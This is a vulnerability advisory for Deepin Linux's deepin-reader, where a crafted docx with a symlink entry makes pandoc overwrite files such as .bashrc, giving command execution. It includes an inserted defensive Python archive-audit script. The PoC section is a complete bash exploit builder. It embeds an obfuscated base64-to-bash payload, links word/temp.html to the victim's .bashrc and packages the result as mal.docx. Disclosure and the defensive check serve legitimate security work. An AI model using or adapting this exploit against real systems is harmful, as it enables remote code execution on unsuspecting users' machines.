Summary
Deepin Linux's default document reader, "deepin-reader", suffers from a serious vulnerability caused by a design flaw that leads to Remote Command Execution via a crafted docx document.
Details
deepin-reader is the default document reader for the Deepin Linux operating system. deepin-reader runs several shell commands while handling the docx document format:
- When opening a docx document, deepin-reader creates a temporary directory under /tmp and places the docx document in that directory.
- Then deepin-reader calls the "unzip" shell command to extract the docx file.
- After extraction, deepin-reader calls the "pandoc" command to convert the docx file to an html file named "temp.html" under the word/ directory (created when the docx file is extracted with unzip). The command looks something like: "pandoc temp.docx -o word/temp.html".
- Then deepin-reader converts that html file to pdf and opens the pdf.
This is what happens when a docx file is opened in Deepin Linux OS.
This behavior can be exploited by placing a symlink named word/temp.html inside a crafted malicious docx, pointing to any file on the target system.
So, while the docx file is being opened, pandoc writes to the system file that the symlink word/temp.html points to.
This is a file overwrite vulnerability.
Remote Code Execution can be achieved by overwriting files like .bashrc, .bash_login, etc. The RCE is triggered when the user opens a terminal.
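The vulnerable flow above has two weak points: untrusted archive entries are extracted with their symlinks preserved, and the converter then writes its output through a path the archive controls. The following check is added here as an example for defenders; it is not deepin-reader's code nor the advisory author's. It audits a docx (a ZIP container) for symlink entries, absolute paths and ".." components before extraction, refuses the whole archive if any are present, and opens its own output file with O_NOFOLLOW|O_EXCL so a planted link is never followed. The sample archive is constructed in memory, and the link target /home/victim/.bashrc and all function names are assumptions made for the example.

```python
"""Audit a .docx ZIP container before an unzip-then-convert step.

Added example for this advisory (not deepin-reader code). The sample
archive below is constructed in memory; only the entry name word/temp.html
is taken from the advisory.
"""
import io
import os
import stat
import tempfile
import zipfile
from typing import List

UNIX_MODE_SHIFT = 16  # ZIP external_attr keeps the Unix st_mode in its high 16 bits


def entry_mode(info: zipfile.ZipInfo) -> int:
    """Unix mode bits recorded for a ZIP entry (0 when the creator stored none)."""
    return (info.external_attr >> UNIX_MODE_SHIFT) & 0o177777


def is_symlink_entry(info: zipfile.ZipInfo) -> bool:
    return stat.S_ISLNK(entry_mode(info))


def audit_archive(data: bytes) -> List[str]:
    """Return human-readable findings; an empty list means no risky entries."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if is_symlink_entry(info):
                # For a symlink entry the stored "content" is the link target.
                target = zf.read(info).decode("utf-8", "replace")
                findings.append(f"symlink entry {name!r} -> {target!r}")
            if os.path.isabs(name):
                findings.append(f"absolute path {name!r}")
            if ".." in name.replace("\\", "/").split("/"):
                findings.append(f"path traversal in {name!r}")
    return findings


def safe_extract(data: bytes, dest: str) -> int:
    """Extract into dest only if the audit is clean; return the entry count."""
    findings = audit_archive(data)
    if findings:
        raise ValueError("refusing to extract: " + "; ".join(findings))
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        # zipfile never recreates symlinks on extract (defense in depth).
        zf.extractall(dest)
        return len(zf.infolist())


def write_nofollow(path: str, data: bytes) -> None:
    """Create the output file without following a pre-planted symlink.

    O_EXCL fails if anything already exists at path (a dangling link included);
    O_NOFOLLOW refuses to traverse a final-component symlink on its own.
    """
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)


def build_sample_docx(link_target: str = "/home/victim/.bashrc") -> bytes:
    """Constructed fixture: a docx-like ZIP whose word/temp.html is a symlink entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        link = zipfile.ZipInfo("word/temp.html")
        link.create_system = 3  # Unix, so extractors honour the mode bits
        link.external_attr = (stat.S_IFLNK | 0o777) << UNIX_MODE_SHIFT
        zf.writestr(link, link_target)
    return buf.getvalue()


def build_clean_docx() -> bytes:
    """Constructed fixture: the same container without the symlink entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


def demo() -> dict:
    """Run the checks against both fixtures and report what each one did."""
    with tempfile.TemporaryDirectory() as d:
        try:
            safe_extract(build_sample_docx(), os.path.join(d, "mal"))
            refused = False
        except ValueError:
            refused = True
        extracted = safe_extract(build_clean_docx(), os.path.join(d, "clean"))
        # Simulate a link already sitting where the converter wants to write.
        planted = os.path.join(d, "temp.html")
        os.symlink(os.path.join(d, "does-not-exist"), planted)
        try:
            write_nofollow(planted, b"<html></html>")
            link_write_refused = False
        except OSError:
            link_write_refused = True
    return {"malicious_refused": refused, "clean_extracted": extracted,
            "link_write_refused": link_write_refused}


if __name__ == "__main__":
    for finding in audit_archive(build_sample_docx()):
        print("[!]", finding)
    print(demo())
```

The audit runs on the ZIP central directory alone, so it costs nothing compared with the extraction itself, and rejecting the archive outright is simpler to reason about than trying to extract "everything except the links".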
PoC
The code below is a PoC exploit for the issue.
#!/bin/bash
myBanner(){
echo "
╔╦╗┌─┐┌─┐┌─┐┬┌┐┌ ╦═╗┌─┐┌─┐┌┬┐┌─┐┬─┐
║║├┤ ├┤ ├─┘││││───╠╦╝├┤ ├─┤ ││├┤ ├┬┘
═╩╝└─┘└─┘┴ ┴┘└┘ ╩╚═└─┘┴ ┴─┴┘└─┘┴└─
╦═╗╔═╗╔═╗ ╔═╗─┐ ┬┌─┐┬ ┌─┐┬┌┬┐
╠╦╝║ ║╣ ║╣ ┌┴┬┘├─┘│ │ ││ │
╩╚═╚═╝╚═╝ ╚═╝┴ └─┴ ┴─┘└─┘┴ ┴
0-day
[Affected Operating System: Deepin Linux]
-by Febin (@febin_nj)
"
}
checkPandoc(){
if [ $(which pandoc) ]
then
echo "[+] Pandoc is installed!"
else
echo "[-] Pandoc is not installed! Install pandoc to run this exploit.."
exit
fi
}
mainProgram(){
printf "
[ This Exploit will craft a malicious document (.docx) from the specified TEXT file and store the malicious docx under output/ directory ]
"
mkdir output 2>/dev/null
printf " [>] Path to your TEXT file (default = ./sample.txt): "
read html_file
html_file=${html_file:-./sample.txt}
printf " [>] Enter the target username: "
read username
printf " [>] Enter the oneliner command to execute on target: "
read cmd
if [ -e "$html_file" ]
then
cp "$html_file" out.html
else
echo "[-] The specified txt file doesn't exist!"
exit
fi
b64cmd=$(echo "$cmd"|base64)
payload="<p>/dev/null;\${IFS}c\l\e\a\r;echo\${IFS}${b64cmd}|b\a\s\e\${NULL}64\${IFS}-d|b\${NULL}a\s\h;r\m\${IFS}/home/${username}/.b\a\s\h\r\${NULL}c;e\x\i\t #</p>"
echo "${payload}$(printf '\n') $(cat out.html)" > out.html
pandoc out.html -o output/mal.docx
#pandoc output/mal.docx -o output/mal.html
rm -rf out.html
mkdir word 2>/dev/null
ln -s /home/${username}/.bashrc word/temp.html
zip -u -y output/mal.docx word/temp.html >/dev/null
rm -rf word/
echo "[+] Malicious document is written to: $(realpath output/mal.docx)"
}
myBanner
checkPandoc
mainProgram
Impact
This is a file overwrite vulnerability.
Remote Code Execution can be achieved by overwriting files like .bashrc, .bash_login, etc. The RCE is triggered when the user opens a terminal.